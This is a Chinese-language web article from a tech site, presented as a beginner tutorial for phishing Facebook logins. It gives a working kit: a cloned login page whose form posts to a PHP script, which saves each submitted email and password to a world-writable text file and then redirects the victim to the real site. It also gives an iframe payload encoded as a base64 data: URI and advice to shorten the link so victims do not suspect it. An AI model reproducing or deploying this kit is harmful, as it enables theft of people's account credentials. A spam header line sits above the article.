自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

如何利用iframe URI釣魚

安全 應(yīng)用安全
本文以盜取facebook登陸帳號的釣魚為例,來示例如何釣魚攻擊的基本步驟。過程很簡單,主要包括兩個步驟,制作釣魚頁面,與釣魚URI,其他網(wǎng)站的釣魚頁面也可以采取相似的方法,剛接觸釣魚的可以看看。

本文以盜取facebook登陸帳號的釣魚為例,來示例如何釣魚攻擊的基本步驟。過程很簡單,主要包括兩個步驟,制作釣魚頁面,與釣魚URI,其他網(wǎng)站的釣魚頁面也可以采取相似的方法,剛接觸釣魚的可以看看。

一、制作釣魚頁面

以盜取facebook登陸帳號的釣魚為例,一共包含三個文件,index.html,login.php,password.txt

第一步:制作index.html登陸頁面

首先,打開 https://www.facebook.com頁面,查看源碼,將源碼copy到index.html文件中。

然后,編輯index.html文件,找到

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" 
method="post" onsubmit="return window.Event &amp;&amp; 
Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">

將action的值改為

action=login.php?"https://www.facebook.com/login.php?login_attempt=1"

 

(login.php是用來盜取登陸帳號密碼的)

將index.html放到web目錄下(我的放置在/Library/WebServer/Documents/facebook目錄下)

 

利用iframe URI釣魚(以盜取facebook登陸帳號的釣魚為例)

第二步:制作盜取facebook帳戶和密碼的腳本login.php

 

<?php
header ('Location: https://www.facebook.com ');//跳轉(zhuǎn)到真實的facebook頁面
$handle = fopen("password.txt", "a");//將假頁面中提交的POST數(shù)據(jù)寫入password.txt文件中foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");}
fwrite($handle, "===============\r\n");
fclose($handle);exit;?>

 第三步:創(chuàng)建接收POST數(shù)據(jù)的password.txt文件

dani-2:facebook leedani$ pwd /Library/WebServer/Documents/facebook
dani-2:facebook leedani$ sudo touch password.txt  
dani-2:facebook leedani$ sudo chmod a+w password.txt  

第四步:測試

登陸http://localhost/facebook/

輸入電子郵件與密碼,點擊登陸

查看password.txt文件

dani-2:facebook leedani$ cat password.txt  

利用iframe URI釣魚(以盜取facebook登陸帳號的釣魚為例)

看,email與pass字段就是facebook的登陸帳號與密碼。

二、制作釣魚URI

一般釣魚會采用iframe用釣魚頁面遮蓋原始頁面的方式來進(jìn)行釣魚,接下來的操作就是生成一個有這個功能的Data: URI,并將這個URI進(jìn)行短地址轉(zhuǎn)換

第一步:生成攻擊代碼

src就是你存放釣魚網(wǎng)頁的地址

<style> body {margin:0; overflow:hidden;}</style><iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" 
frameBorder="0" scrolling="auto">iFrame Failed</iframe

第二步:將攻擊代碼轉(zhuǎn)換為data: URI

登陸http://dopiaza.org/tools/datauri/index.php,將上面代碼粘貼進(jìn)去,

利用iframe URI釣魚(以盜取facebook登陸帳號的釣魚為例)

對應(yīng)的data: URI

data:text/plain;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+

將上面的data: URI中的data:text/plain改成data:text/html

data:text/html;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+

訪問修改后的Data URI,我們可以看到

利用iframe URI釣魚(以盜取facebook登陸帳號的釣魚為例)

點擊facebook圖標(biāo),或下面的url鏈接(瀏覽facebook.com),將跳轉(zhuǎn)到我們在第一步中創(chuàng)建的facebook的假登陸頁面 http://localhost/facebook/。

第三步:生成data: URI對應(yīng)的短地址

很顯然,這個URI太長了,會引起懷疑,在真實環(huán)境下,我們可以先進(jìn)行短網(wǎng)址轉(zhuǎn)換,例如http://tinyurl.com/就提供這個服務(wù)

利用iframe URI釣魚(以盜取facebook登陸帳號的釣魚為例)

最后,引誘受害者點擊這個會連接到釣魚網(wǎng)頁的URI就可以盜取帳號密碼了。

參考:http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/

責(zé)任編輯:藍(lán)雨淚 來源: 碳基體
相關(guān)推薦

2009-01-04 09:57:24

2024-05-24 14:39:33

2015-06-15 11:45:55

2010-10-25 11:52:05

RSA身份認(rèn)證總監(jiān)在線欺詐

2024-01-05 08:58:36

2023-12-14 15:34:19

2017-01-20 15:34:10

2024-03-11 16:03:59

2023-08-03 17:57:43

2009-10-28 10:31:39

在線交易SSL證書

2014-09-11 15:04:13

2025-01-10 11:55:58

2011-07-05 14:22:19

2013-03-11 18:04:02

2024-08-20 15:38:02

2020-02-04 09:02:02

新型冠狀病毒網(wǎng)絡(luò)釣魚攻擊

2021-08-29 21:58:58

釣魚攻擊微軟SharePoint

2020-10-08 09:55:32

釣魚郵件黑客網(wǎng)絡(luò)釣魚

2020-08-07 10:41:20

網(wǎng)絡(luò)釣魚網(wǎng)絡(luò)攻擊漏洞

2022-01-06 07:56:31

DMARC網(wǎng)絡(luò)釣魚攻擊
點贊
收藏

51CTO技術(shù)棧公眾號